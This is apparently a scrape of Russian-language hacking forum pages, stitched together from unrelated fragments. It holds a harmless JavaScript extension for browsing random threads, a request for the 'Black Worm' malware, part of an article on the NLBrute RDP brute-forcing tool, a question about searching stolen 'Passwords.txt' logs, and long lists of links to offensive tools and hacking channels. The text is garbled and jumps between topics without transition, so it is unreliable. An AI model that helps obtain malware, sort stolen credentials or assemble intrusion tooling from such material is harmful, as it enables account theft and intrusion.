файл dig_up.zip в build/dig_up.xpi
--
Шаги 3 и 4 для TOR
--
3. Перейти в браузере на about:addons -> нажать на 3 точки -> Manage
4. Разрешить работу в приватных окнах выбрав "Allow"
Spoiler: Использование | Usage
После установки возле кнопки DEPOSIT у вас появится кнопка BEGIN THE DIG (или
НАЧАТЬ РАСКОПКИ для ру версии):
Нажимаете ее, расширение начинает поиск:
И вы попадаете на рандомную статью:
Spoiler: Код | Code
JavaScript:Copy to clipboard
console.log('"Dig Up" extension works!');
function getRandomNumber(min, max) {
return Math.floor(Math.random() * (max - min + 1)) + min;
}
function createButton() {
// to avoid duplicates
if (document.querySelector("#searchOldThreadButton")) {
return;
}
const newLi = document.createElement("li");
const divContainer = document.createElement("div");
divContainer.className = "p-navEl u-ripple rippleButton"; // for some suitable appearance
const button = document.createElement("a");
button.id = "searchOldThreadButton";
button.textContent =
document.documentElement.lang === "en-US"
? "BEGIN THE DIG"
: "НАЧАТЬ РАСКОПКИ";
button.className = "p-navEl-link";
button.style.color = "#CFB53B"; // old gold color =)
button.style.cursor = "pointer";
button.href = "#";
button.onclick = async function (event) {
event.preventDefault();
button.textContent =
document.documentElement.lang === "en-US"
? "DIGGING..."
: "РАСКАПЫВАНИЕ...";
button.disabled = true;
await tryRequest(100, button);
};
divContainer.appendChild(button);
newLi.appendChild(divContainer);
const navList = document.querySelector(".p-nav-list.js-offCanvasNavSource");
if (navList) {
navList.appendChild(newLi);
} else {
console.error("Place to insert the button not found.");
}
}
async function tryRequest(retries = 100, button) {
for (let i = 0; i < retries; i++) {
const randomNumber = getRandomNumber(2000, 24500);
const threadsEndpoint = `/threads/${randomNumber}`;
const url = `${window.location.origin}${threadsEndpoint}`;
button.textContent =
document.documentElement.lang === "en-US"
? `DIGGING (${threadsEndpoint})...`
: `РАСКАПЫВАНИЕ (${threadsEndpoint})...`;
try {
const response = await fetch(url);
if (response.status === 200) {
window.location.href = url;
return;
} else {
console.log(
`Attempt ${i + 1}: Request to ${url} failed with status: ${
response.status
}`
);
}
} catch (error) {
console.error(`Attempt ${i + 1}: Error making request to ${url}:`, error);
}
}
// if 100 attemps to find a valid page fail
button.textContent =
document.documentElement.lang === "en-US"
? `НЕУДАЧА, ПОПРОБУЙ ЕЩЕ РАЗ :(`
: `BAD LUCK, TRY AGAIN :(`;
button.disabled = false;
}
createButton();
Получилось вполне залипательно, можно часами сидеть на форуме и играться,
окунаться в прошлое. Это как тикток, только от него ты не становишься
brainrot, а наоборот
Всем спасибо. Всем пока.
You must have at least 2 message(s) to view the content.
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.cdn- telegram.org%2Ffile%2FpIciASBK6M0wnWzB-lAOi- qHbvZCfTEVwyTxqrqC4yYXA0ztpeitw1kdbYCb3DEmrHbZ21Se913tZfadW8_qL7B_vVGwblGtSsCggpufYqAujRVf8tddVmQ2gxORBpr3Md3QhkUvUHTPRS_8Cc6JxhRXNyvV7Gsrk880JrYOT2KQPLtbO3_dKHLGB0rx7LyzPl4_d_TrrwOF_Pj40-TEftCa23y5SPfNg8hR0X4B-c5FtD7tSs7jONsG2IaJk_TSy8fUmq4PaBZgbdsvuLCfXEEqqS5xEcbMEliiWLbqbKOcFNuWvxy8W9zsNusFQOLXdtVf544fVegmZYFVEZ4HKQ.jpg&hash=88d4367a72d8ab14dbc02cb1044245c7&return_error=1)
https://t.me/+y7zKn-hjtBU4M2Rk
t.me
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2Fd570afcbfc55b85c57f25f98c95ca35c82fc87aa84a9450aff00bcfef67122eb%2Fsbilly%2Fawesome- security&hash=2dffc5509ba1cfc2b48ac9c345e6ea34&return_error=1)
libraries, documents, books, resources and cools stuffs about security. ](https://github.com/sbilly/awesome-security)
A collection of awesome software, libraries, documents, books, resources and cools stuffs about security. - sbilly/awesome-security
github.com
Nice collection of awesome software, libraries, documents, books, resources and cool stuff about security.
Diamond Software Pack
![](/proxy.php?image=https%3A%2F%2Fimg.shields.io%2Fbadge%2FDiamond%2520Sorter-4CAF50%3Fstyle%3Dfor- the- badge&hash=a7eb4d885d38249f005ce43315bb53fb)![](/proxy.php?image=https%3A%2F%2Fimg.shields.io%2Fbadge%2FDiamond%2520Checker-2196F3%3Fstyle%3Dfor- the- badge&hash=d0ec45c48be5c900566dcff6cb990ba8)![](/proxy.php?image=https%3A%2F%2Fimg.shields.io%2Fbadge%2FDiamond%2520Hunter- FFC107%3Fstyle%3Dfor-the-badge&hash=abf297953d85714ce6de09c4ed20ce15)
![](/proxy.php?image=https%3A%2F%2Fimg.shields.io%2Fbadge%2FDiamond%2520Browser-9C27B0%3Fstyle%3Dfor- the- badge&hash=7ef30b0380d758f9eefa9da9dd75dce7)![](/proxy.php?image=https%3A%2F%2Fimg.shields.io%2Fbadge%2FDiamond%2520Dumper-F44336%3Fstyle%3Dfor- the-badge&hash=0a9a35dd3359f80ac0667dca3d3adcdc)
Всем привет, заинтересовался одним таким интересным червем под названием Black
Worm v4.1 Expert Edition.
Может у кого имеется он? Буду очень благодарен если поделитесь
A much-favored way to compromise organizations is by targeting environments that use remote desktop protocol (RDP). RDP, developed by Microsoft, is a convenient way to remotely access IT systems and is implemented in a variety of client environments. But it can also be high risk. If an RDP client is exposed to the internet and misconfigured, malicious actors can use search engines for Internet-connected devices, such as Shodan and Censys, to find exposed RDP clients. Once a RDP instance has been found, attackers can utilize a number of tactics, techniques or procedures (TTPs) to try to gain a foothold on the system. Popular TTPs employed by threat actors to gain access to RDP instances are brute-force and password spraying attacks.
Brute-force attacks involve repeatedly entering usernames and passwords in search of a combination that works. Similarly, password spraying repeatedly enters known valid credential combinations, such as admin:password, in the hopes of finding a misconfigured machine. RDP's weaknesses can be somewhat reduced by not exposing clients directly to the internet and using strong passwords with multifactor authentication (MFA). Although awareness of this simplistic avenue for exploitation has been rising, a surprising number of organizations still become victims of ransomware and other attacks due to this initial access vector. RDP continues to be exploited by today's ransomware groups.
One of the most popular tools to brute force RDP credentials is an application called NLBrute. The malicious tool debuted on Feb. 17, 2016, on a cybercrime forum called Antichat from a threat actor who went by the handle dpxaker . NLBrute sold for US$250 in either WebMoney (WMZ) or bitcoin. It was a high- quality tool of choice for hundreds, perhaps thousands of threat actors, brute-forcing RDP credentials at scale, enabling ransomware, tax fraud and more. , fraudsters cheated dpxaker Eventually out of revenue by releasing cracked 32-bit and 64-bit versions of NLBrute in late 2016 and 2017. In early 2017, dpxaker apologized for being offline and promised to deliver a new version of NLBrute, but the persona disappeared entirely from forums in April 2017.
Then, nearly six years later, dpxaker ’s handle surfaced on Feb. 22, 2023. Federal prosecutors in Tampa, Florida, announced that a 28-year-old Russian man, Dariy Pankov , had been extradited to the US from the country of Georgia. Prosecutors unsealed an indictment from April 2019 that accuses Pankov of developing NLBrute and selling 35,000 sets of login credentials. It's alleged Pankov made US $358,437 selling licenses for NLBrute and stolen login credentials. The indictment alleges undercover officers bought login credentials for two law firms located in Florida from Pankov, which had been advertised for US $50 and US $19.25 on an underground marketplace. Pankov is charged with one count of conspiracy, two counts of trafficking in unauthorized access devices, two counts of possession of 15 or more unauthorized access devices and two counts of tracking in computer passwords. Pankov could face up to 47 years in prison.
NLBrute was a pivotal tool for the cybercriminal underground, and while it appears to be past its heyday, cracked versions are still in use. In this blog post, we'll examine NLBrute and RDP risks.
NLBrute: A Speedy Tool
To start brute-forcing credentials, NLBrute needs some information. Users load
lists of IP addresses with vulnerable RDP instances to be attacked along with
a port number. RDP usually runs on port 3389, although it can be changed.
NLBrute also accepts lists of usernames and passwords to be tried against the
RDP login panel. Once that information is loaded, NLBrute goes to work.
According to an analysis in 2021 by
[Cloudsek](https://cloudsek.com/threatintelligence/nlbrute-rdp-brute-forcing-
tool-and-controlled-botnet-for-sale) , version 1.2 of NLBrute was compatible
with a botnet to spread the workload. In the initial advertisements on
Antichat, dpxaker highlighted some of NLBrute's features, including speed
and performance:
PREVIOUSLY WAS A FAIL AT FIRST POST
Есть ли софт который будет сверять логи.
Ну типо АП как с базами ток с логами
Ребят подскажите как в Total Comander искать несколько линков в файле Passwords.txt
пробывал регулярные выражения
| или (*) не работает
Spoiler: Telegrams
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn1.cdn- telegram.org%2Ffile%2FE74CAOzQL- aE4HWbddG4o4KaqqSpu9lOu47mC6Yo3JDnnEGajoxzLAjH581FL5O5UdvngkVK7cu3X9gvPh7kcj4PgaY7jfKs09gzbDar_6Dag6qBrOVsfQIJLgSQ-2vsvWZ5MfUohW5Fl9fugbYdlbJCmonxLbVzXIzpC7rqrmyKq3oQN16pdiP_SGahzTj7nwt7HRzCFoXweoVfVQrcqwAsPTL- _GUxE41yBLD1ctiwnbnDNzZFtaq- qsJcfU8ps0XmNr0jK2E6qjSZBpC9wicJ0K4Uiby1MywefTX0he5rhGxyIJK2BnDeOXN3WgqMvC6_OfNnMKUH3WG- YsUkDg.jpg&hash=1d5d062689b95f50cd945096803f3eb3&return_error=1)
This channel posts IT security related topics and especially alerts. Submissions over at @itsectalk welcome!
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn5.cdn- telegram.org%2Ffile%2FbnsI9Eh_u39FyS9r9h-hcRvQVfqaOyek247zMhfxUAOCaevuIqD5wwdB4-KvRKGj3DeZknKtYqV6myEGdrLG3_PfvwYCHf2D__Ills570ru9366AxRA4Xsaw6zdtokidY_X- Ej9I0DmztGmZ1xZUNJ6eiKFazCT8SDOefuonKzMzKlVMV1zH4qsMmaMmWAUnkW- arYhwLcdUyEqfzyyHjXbQLCSzfY5SEQKE22twISHAAzc5n9PgloDA17vppTTZX2oeQ4bAmtFt0UYeM- wO3nO8JYEDXAFUaSP9J1tJmSm69Z58Gt7zr3glFootYqFmMnntE_BxD3Xfey-1T_ShxQ.jpg&hash=c3d14ae4d785a3cc5c9764f09f00efa8&return_error=1)
You can view and join @exploithacker right away.
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.cdn- telegram.org%2Ffile%2Ff27qtM15BEycMXvzBPs2F8YtigFCFVNW2g5NAskHTDD-CdIxW- dD5Idk- pXOYhxDjNCLjQfDNFWhyyaaLESLNWqij76wPZ2wl23ZK5O3le79AEuKBlSbzC3lb-H27amovdSfJNaoyMIL5lf08ZJ8G_6ns- hUFb- BaolI9yxUffmv5mhtmzrRK5SkCrdtapxRdL9o_G6vwNoUZgyiMr22bEonOLh0e7vEVdRIwYgkH7t53xU8NXT5c8L7Qi_Rv2sztk4e0IdnlozZwUmZeYXWc0eg9rm2aHURiaPEKTjXBYw8dqSiH88EXjlRtGgIqpu9rJTTn4Z0DugPkuUn6IvgOw.jpg&hash=3949aaeeea7a17f53d6e4a16bf58ccd8&return_error=1)
You can view and join @in51d3 right away.
t.me
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.cdn- telegram.org%2Ffile%2FczSkqZwXN6WhhBe89-- F1em45hmey6aoSru6kkSAUXI8hsLNkAJrrjHbQZEpXfZ_CeksoHAxaQp0Gk7gm2vzeD3GmBUiyjyF60St1pk6u1w1VH1AQ9CZ4ruxy3g7TqDNEFEA3nBiJNIB- xyxW0B6Wmi4ikLI69E2x-HVguV5hAy94c_8A122tjrGZJlhoc_ufAZ0QBQOzVkpFY7vtgiCAB3nbUu7uHeMLX5Ga6gPI6qYz-W9AJ6VsEOmnmLbhz_lCA9y9xR3Bm5dVPTsX7Zb5M-36LBr7-jte1XJ8IfwbYaYfyEexW_4ZrlHVBhy- PRZPTMy68ShHyNRXoEp_Bo70A.jpg&hash=7353eeba85d1e4554651ca55ade96725&return_error=1)
Официальный канал https://forum.antichat.club
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.cdn- telegram.org%2Ffile%2FeROKz5fVY5sJkPS-L0VfhwaqeuMQtXSAuAYvqoBSjUSt1psYY8DvhLP4hCoT- dEmWsXeNoDT7tDvpsDUjYVYMesjGS0u6PYKLWttCidGeUzj1GQPu6WSh4HRaPAw6NYKebNUQB26zJkt67P143hXQkM1Z_Isf3nHJ0Iw5TjdwUOd3xGq3xxhtOetfnaO9J_WZuNZjlf8JuAuErS5sMebP4UwywjRQfUmlXNjSuKc0aZ9VIOPh2rhluutwkILIVgBSED6zABsDhALxq18QHTrlLuncqgcTSPHnXI9ehWz- VmrpABZgAtrvIbr6DFh- nLVL59qT1zb1aCSe4f380yEiw.jpg&hash=1eb8fbcd078963b3e48401c8f61808d3&return_error=1)
Technical security news @techpwnews - Technical security news @pwnnews - General security news
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn5.cdn- telegram.org%2Ffile%2FU3R2oqyeZAKwBQfSEJEO4g1HrBxGG6T-WS22Tn4GcFyg5I_0FBWJbRBVuwfTvg0abBAa3gSX5jgchjLCa8h-KejORN2ZtyiISfKifOLYWWkyHmO0RK_2q2MdoCU4597u-aOGWe2oRQSY_kgay8vGQX- ZDAuXu5LAGx9-z9uPFXDvbxObVvZxtb_a9wxTC3FYiC_wuFU9GnDu-1ACby1MI1ct5INO9rl1w_js_2YM64U7lKazIMPT14HPkr2s8H2H_DVkJPjQ5A7qzVDRVLks6Oq8d8STLbLgHefimcYrYRKg3wvJYhXxSIP8Y5VhOPBiN0HKBomvm4PVQiozuzoUPQ.jpg&hash=1b4295bd785be9a838cef5d99c0d23df&return_error=1)
Alert on the latest CVEs Partner channel: @malwr Contact: @SirMalware
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.cdn- telegram.org%2Ffile%2FiaLe73hMPMWLozUdjVIUhxr2YH3bIOxCYtmQO5BrmzQR8OQMW5DqyBuhfIui1PxokD0UQf7sKbOCqSOSWAm23Rvsd0zgTcL0dK7CcApOmuAJXj5dSreQ3ejsXAwuQg1zKrCv485uHPYtYE8CwQEDSralimmAkBEQFkvPQqmMtYwZb9swVyQfFuvNzEbqSWbEZcVSyg0SrYYEwVKBhcIQtvKI_FysF5BMdyQyyxtQl6_VY4usc_I0YvXDf7Zqe3Kct4moyoUVQREykQKZ06fnrngaWk1ao6ivb9wqNAadNtA5ZU3Wy- IQc3ivFjA8B7eh9ks9S2WeR5gmLEkc06UmRg.jpg&hash=3c1f1cebe930bfd13733ed3183c916d9&return_error=1)
Group for Malware Analysts. Pinned message with resources and rules: https://t.me/MalwareResearch/38033
t.me
t.me
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.cdn- telegram.org%2Ffile%2FDuzDb_9OiHpUWWrNpTvQhRWbhtPAUcKlPtqsFVtHny- OP161GaciWQoy- tannWTwxCb2sQ5psEuXZxGkrJdUwZ9lHNRQvZ7wYB7lcrGk47fBOzX3I8Sm0F_nLl8S21-Qm8piGwg3OtncnYenJ8MXlww9hrI- nvzTmgeFnwrsvuNnZGx050b0mKCXbsYhvXwuD65kzk4I_Js6v7diqqFXJV86rdkspGyR6OVDW9xFhxq2Sg_4-SIUZcu0_BkY5FvXfXHwTItdezBJ7LRBxa2bP8VrSs6crcySlyRjBxkXI7dcNV2CAgylB3uW5XcPInwblvgWhaE2S8nlac- m_IOFsw.jpg&hash=f58027f0759dabc3bd015bfee8ddb196&return_error=1)
❗️We Do Not Support, Encourage & Promote Any illegal Activity. Contact For Paid Promotion:-https://instagram.com/cyb3rhunterx
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn5.cdn- telegram.org%2Ffile%2Fnb_MFqNOVWRPbvklARW7HiESANTY82qoTF8m1FmnRROKWvhqoG-T2dRgh2uV7ulXDTmMVmr1Wt2-P3eidR2NCYjaMyBDIPCBZ92SjgrRQgPtRc- GLUxRNbaU3rFnKCmjO- LgYfNm5J6sZFtlvLGpw2vKk-y1hrx6Ayluo9MaDz8nhPvn1uznXK9iOizPndwYrxw5AQSy9BG4W1j_L7gdi5H2dpglT6a8geRnId176fH3d125n58y4bXKw9hrYUqDK4SpiWxzvXIA8YkfsIoNFXoKiniwaV-L6m87gzZCBC8Oxm-U7hgUf- DhkjlWDZjB3RoDigTnndeB02X6GPd01w.jpg&hash=6d46521c551e4a769b05020158e8da06&return_error=1)
@HackerTrain @BugCrowdChat @hackershandbook @hackTheBox_Training @ZishanAdThandarChannel https://zishanadthandar.github.io • No adult/disrespect/abusive/Spam/Ads/offtopic/piracy/illegal content • Don't impersonate
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.cdn- telegram.org%2Ffile%2Ffr4JkrhQacDUiydUUEl1bryAUHa91qUFsNI56xzg_jeuN6inoeDOTve- FhNuDFXniVtQ_mRhMKC1O5te3RxXFpvXpjpzylU2LalIfrJf- lhiMuNTM67FfSZH_5jwsOqSyqbZuOq2GBHkdTpmFhC7tkHb5RWSlf5kY4mP- jq03xx1ZPMi87QYBnT_1FMaRDzcsh7oZOy2OWAhU_J91sk3qEIqm12yln6mSwq7GbHax6du-86RUD0lQ_QPPPlnsOFcG3s07WRVQwLLbUd7oaoGEIdQwgSAxg2mFSXluJq5XtW5QKctSEBbajzOzHsXqX5B9437WIOns_8DUIJe0ycGkw.jpg&hash=9a0505957a0e08b07b18224edb947013&return_error=1)
Happy hunting! thebugbountyhunter.com hello@thebugbountyhunter.com
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.cdn- telegram.org%2Ffile%2FCoLZilo_ENuh15YZwv2Xi1AbfIPuCVSf0GriP4Qzfy55t4RjiypLKN4T97OSFULaMqTqwxNFYZaDpipZKD1-r95roz7yNAxDLo4yWnhh0zaJ05Le8m7lRrWH1uSc8pgvu39z0SQsOczTozRaIu3FsyOagNDpjBR0Jhpb07Jws8iZpeF_xhTCNnqtkRPp2nCnT- LXqc9Kq1Z7uIGvJfWkHkGBNVnPIa-603dwHqhnrclEEpfN3WPBVxRaqG93kDqok5eHKi7DkSHNIgJOyLXsfiPyCBLfhH41N1Bf-t9OlZBQZw3uehE_cVENP_VPd0k3SYqToKvKyGsp0oU96ze5SQ.jpg&hash=827b2910d018a4eeb7a75cdfe61c2664&return_error=1)
Пул тегов: https://t.me/RalfHackerChannel/297 Чат канала: https://t.me/RalfHackerPublicChat Админ: @hackerralf8
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.cdn- telegram.org%2Ffile%2FQgQ_hM7VouS9aB5xV7L-NZYrQvmGD5WieHpow7de1P7TZeh62PGfGr62Q7g1XTNb3Plkl8XeKkSGIzvuDWeGfAITAnS966CiHm8DvPVeX6oBUsnyv7ppho3vJx__NNeyPNh6vXvFRQLsE5OyrrPCGTaZUVkGpRXYdU7gH4GwhZRHDdoDrAjt61amZEeIPGyosIPLu_iNWF-4xPjUz79yntSoIzhALxlUIhLehOIEAAs- yO_y8AiXKUpQPocS9Urkt9ouckA1euSnPKooHBn5lQsmJ8WlzQBwLtNSxGKhQOlLeAJ3IPmNOVe_DaHPWyH_gTp_NZ4im3m0wiJrceijug.jpg&hash=dde158669d8311fd2f969b6319fc5fd5&return_error=1)
make a donation if you appreciate our work: paypal.me/razorshellcourse
t.me
Spoiler: GitHub Repos
![github.com](/proxy.php?image=https%3A%2F%2Frepository- images.githubusercontent.com%2F15376784%2F16330300-0e0c-49a3-aefd-520bb3279fa2&hash=3a0b843bda0e6f63c5639707d5c8c09a&return_error=1)
WSGI ](https://github.com/mar10/wsgidav)
A generic and extendable WebDAV server based on WSGI - mar10/wsgidav
github.com
](https://github.com/chemeris/msinttypes/blob/master/stdint.h)
Automatically exported from code.google.com/p/msinttypes - chemeris/msinttypes
github.com
the user password after a password reset (get the previous hash with DCSync) ](https://github.com/vletoux/NTLMInjector)
In case you didn't now how to restore the user password after a password reset (get the previous hash with DCSync) - vletoux/NTLMInjector
github.com
invokethreatguy/AggressorCollection ](https://github.com/invokethreatguy/AggressorCollection/blob/master/harleyQu1nn/logvis.cna)
Collection of awesome Cobalt Strike Aggressor Scripts. All credit due to the authors - invokethreatguy/AggressorCollection
github.com
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F46cb03dba40a4382efec81995d7f4b8470449c3739a0187fbea56d0a154bd2d6%2Fbluscreenofjeff%2FRed- Team-Infrastructure-Wiki&hash=1bad95ee0a115441da6ea36697a1aa93&return_error=1)
Red Team infrastructure hardening resources ](https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki)
Wiki to collect Red Team infrastructure hardening resources - bluscreenofjeff/Red-Team-Infrastructure-Wiki
github.com
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F5c219d6e3790342bb9efd24b8da009ef7476adf528b94a7bbb1d7556d886f395%2Fvysecurity%2FInvoke- ProcessScan&hash=fdc166e5fb4a4c074fb85e4e8961e4a2&return_error=1)
EQGRP shadow broker leaked list to give some descriptions to processes. ](https://github.com/vysec/Invoke-ProcessScan)
Gives context to a system. Uses EQGRP shadow broker leaked list to give some descriptions to processes. - vysecurity/Invoke-ProcessScan
github.com
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F3288b4d46144f667c600ab0c3e9e189fd267ad70acc892f8dbf0e1632c77d6d5%2Fvysecurity%2FAggressor- VYSEC&hash=2604d4605850ab4fe70409948e67cd5e&return_error=1)
](https://github.com/vysec/Aggressor-VYSEC/blob/master/ping.cna)
Contribute to vysecurity/Aggressor-VYSEC development by creating an account on GitHub.
github.com
Harvester with a Word Document Template URL Injector ](https://github.com/ryhanson/phishery)
An SSL Enabled Basic Auth Credential Harvester with a Word Document Template URL Injector - ryhanson/phishery
github.com
[ https://raw.githubusercontent.com/enigma0x3/Invoke- LoginPrompt/master/Invoke-LoginPrompt.ps1 ](https://raw.githubusercontent.com/enigma0x3/Invoke- LoginPrompt/master/Invoke-LoginPrompt.ps1)
evil.HTA ](https://github.com/vysec/MorphHTA)
morphHTA - Morphing Cobalt Strike's evil.HTA. Contribute to vysecurity/morphHTA development by creating an account on GitHub.
github.com
jabb3rd/RouterOS_Tools ](https://github.com/jabberd/RouterOS_Tools/blob/master/winbox-extract- passwords.py)
RouterOS security testing tools. Contribute to jabb3rd/RouterOS_Tools development by creating an account on GitHub.
github.com
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F693e3c77e06365e5c2eda23887ae98dd6be2bb6dc373d3be31b38bc1b6fed8e8%2Fdanilabs%2Fscripts- nse&hash=e22cd143d0ac701d46f292d6f08c8123&return_error=1)
](https://github.com/DaniLabs/scripts-nse/blob/master/README.md#comtrend- vg-8050)
Some NSE scripts to search information from routers - danilabs/scripts-nse
github.com
"Trust.csv" file generated by Veil PowerView. Provides graph based analysis and output. ](https://github.com/sixdub/DomainTrustExplorer)
Python script for analyis of the "Trust.csv" file generated by Veil PowerView. Provides graph based analysis and output. - GitHub - sixdub/DomainTrustExplorer: Python script for analyis ...
github.com
utility ](https://github.com/wiire/pixiewps)
An offline Wi-Fi Protected Setup brute-force utility - wiire-a/pixiewps
github.com
that uses WMI to extract saved session information for remote access tools such as WinSCP, PuTTY, SuperPuTTY, FileZilla, and Microsoft Remote Desktop. It can be run remotely or loca ](https://github.com/fireeye/SessionGopher)
SessionGopher is a PowerShell tool that uses WMI to extract saved session information for remote access tools such as WinSCP, PuTTY, SuperPuTTY, FileZilla, and Microsoft Remote Desktop. It can be r...
github.com
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2Fcb1fb263b012ee48bc4a1736e89851242cac08aefcd4c67459de6fb2b2a395cc%2Frsmudge%2FZeroLogon- BOF&hash=7de1f511aece20c3c12a7b912a18b2e4&return_error=1)
BOF)
Contribute to rsmudge/ZeroLogon-BOF development by creating an account on GitHub.
github.com
](https://github.com/harleyQu1nn/AggressorScripts/blob/master/logvis.cna)
Collection of Aggressor scripts for Cobalt Strike 3.0+ pulled from multiple sources - harleyQu1nn/AggressorScripts
github.com
](https://github.com/AlsidOfficial/WSUSpendu/blob/master/WSUSpendu.ps1)
Implement WSUSpendu attack. Contribute to AlsidOfficial/WSUSpendu development by creating an account on GitHub.
github.com
](https://github.com/machosec/Mystique/blob/master/Mystique.ps1)
PowerShell module to play with Kerberos S4U extensions - machosec/Mystique
github.com
Launcher, which runs within their own embedded PowerShell Host. ](https://github.com/Cn33liz/StarFighters)
A JavaScript and VBScript Based Empire Launcher, which runs within their own embedded PowerShell Host. - Cn33liz/StarFighters
github.com
https://github.com/HarmJ0y/KeeThief'
endianess at compile time on a variety of platforms ](https://github.com/rofl0r/endianness.h)
simple public domain header to get endianess at compile time on a variety of platforms - rofl0r/endianness.h
github.com
🔴 Red Team operator. 👾 I live & breath Windows malware. 🛡️ Securing the world by stealing cyber criminals' operation theater and exposing it through code - mgeeky
github.com
](https://github.com/PowerShellMafia/PowerSploit/blob/master/Mayhem/Mayhem.psm1)
PowerSploit - A PowerShell Post-Exploitation Framework - PowerShellMafia/PowerSploit
github.com
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F6269563d1f6fc2c80af8d2df7202db96db0b328c27318d1fcc880bb55baeda85%2Fsecretsquirrel%2Fthe- backdoor-factory&hash=19252970a1ebf3942624d2c221b29979&return_error=1)
binaries with shellcode new version in development, available only to sponsors ](https://github.com/secretsquirrel/the-backdoor-factory)
Patch PE, ELF, Mach-O binaries with shellcode new version in development, available only to sponsors - secretsquirrel/the-backdoor-factory
github.com
files hosted on various websites for a particular domain by using specially crafted Google, and Bing searches. It then allows for the download of those files from the target domai ](https://github.com/dafthack/PowerMeta)
PowerMeta searches for publicly available files hosted on various websites for a particular domain by using specially crafted Google, and Bing searches. It then allows for the download of those fil...
github.com
ramen0x3f/AggressorScripts ](https://github.com/ramen0x3f/AggressorScripts/blob/master/leave_no_trace.cna)
Contribute to ramen0x3f/AggressorScripts development by creating an account on GitHub.
github.com
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F3288b4d46144f667c600ab0c3e9e189fd267ad70acc892f8dbf0e1632c77d6d5%2Fvysecurity%2FAggressor- VYSEC&hash=2604d4605850ab4fe70409948e67cd5e&return_error=1)
](https://github.com/vysec/Aggressor-VYSEC/blob/master/vnc-psh.cna)
Contribute to vysecurity/Aggressor-VYSEC development by creating an account on GitHub.
github.com
![github.com](/proxy.php?image=https%3A%2F%2Frepository- images.githubusercontent.com%2F1212922%2F0933ae00-d41e-11e9-85da-8c22b674c731&hash=d69020d3fd4b6b67894de2b9bf972153&return_error=1)
E-mails, subdomains and names Harvester - OSINT . Contribute to laramies/theHarvester development by creating an account on GitHub.
github.com
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2Fc9811a277a5e9411eeca90b9fa96c1bbea0e5acc31d01c90309003d353943e46%2FS1ckB0y1337%2FActive- Directory-Exploitation-Cheat- Sheet&hash=d2c622f0d150a7d4a5216305553c628b&return_error=1)
sheet that contains common enumeration and attack methods for Windows Active Directory. ](https://github.com/S1ckB0y1337/Active-Directory-Exploitation- Cheat-Sheet)
A cheat sheet that contains common enumeration and attack methods for Windows Active Directory. - S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
github.com
http://ebourg.github.com/jsign
written in Python 2.7 ](https://github.com/EmpireProject/EmPyre)
A post-exploitation OS X/Linux agent written in Python 2.7 - EmpireProject/EmPyre
github.com
without payloads ](https://github.com/vysec/GenHTA)
Generates anti-sandbox analysis HTA files without payloads - vysecurity/genHTA
github.com
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F3288b4d46144f667c600ab0c3e9e189fd267ad70acc892f8dbf0e1632c77d6d5%2Fvysecurity%2FAggressor- VYSEC&hash=2604d4605850ab4fe70409948e67cd5e&return_error=1)
](https://github.com/vysec/Aggressor-VYSEC/blob/master/auto-prepenv.cna)
Contribute to vysecurity/Aggressor-VYSEC development by creating an account on GitHub.
github.com
Reflective DLL ](https://github.com/rsmudge/vncdll)
Stand-alone VNC server compiled as a Reflective DLL - rsmudge/vncdll
github.com
categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ](https://github.com/minisllc/domainhunter)
Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names - threatexpress/domainhunter
github.com
](https://github.com/oldb00t/AggressorScripts/tree/master/Ps-highlight)
Cobaltstrike Aggressor Scripts . Contribute to oldb00t/AggressorScripts development by creating an account on GitHub.
github.com
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F0ecd5a8f9665964d390a7f6507088da1417dcccb00d7c83916537bcc8aa25fd1%2Fklsecservices%2FInvoke- Vnc&hash=49c16dd32ff61f98dfeeb72e649fa571&return_error=1)
](https://github.com/artkond/Invoke-Vnc)
Powershell VNC injector. Contribute to klsecservices/Invoke-Vnc development by creating an account on GitHub.
github.com
](https://github.com/fmtn/a)
ActiveMQ CLI testing and message management. Contribute to fmtn/a development by creating an account on GitHub.
github.com
Credentials ](https://github.com/ezelf/CVE-2018-9995_dvr_credentials)
(CVE-2018-9995) Get DVR Credentials. Contribute to ezelf/CVE-2018-9995_dvr_credentials development by creating an account on GitHub.
github.com
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F3288b4d46144f667c600ab0c3e9e189fd267ad70acc892f8dbf0e1632c77d6d5%2Fvysecurity%2FAggressor- VYSEC&hash=2604d4605850ab4fe70409948e67cd5e&return_error=1)
VYSEC ](https://github.com/vysec/Aggressor-VYSEC/blob/master/Invoke- CredLeak.ps1)
Contribute to vysecurity/Aggressor-VYSEC development by creating an account on GitHub.
github.com
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F1320a29357bfee4305e0f058af8d2dd3b05e746b22e2d261c28c2eaa7f271b16%2Fshellntel- acct%2Fscripts&hash=4bff1082f39fc27d845df273f2f0b1b5&return_error=1)
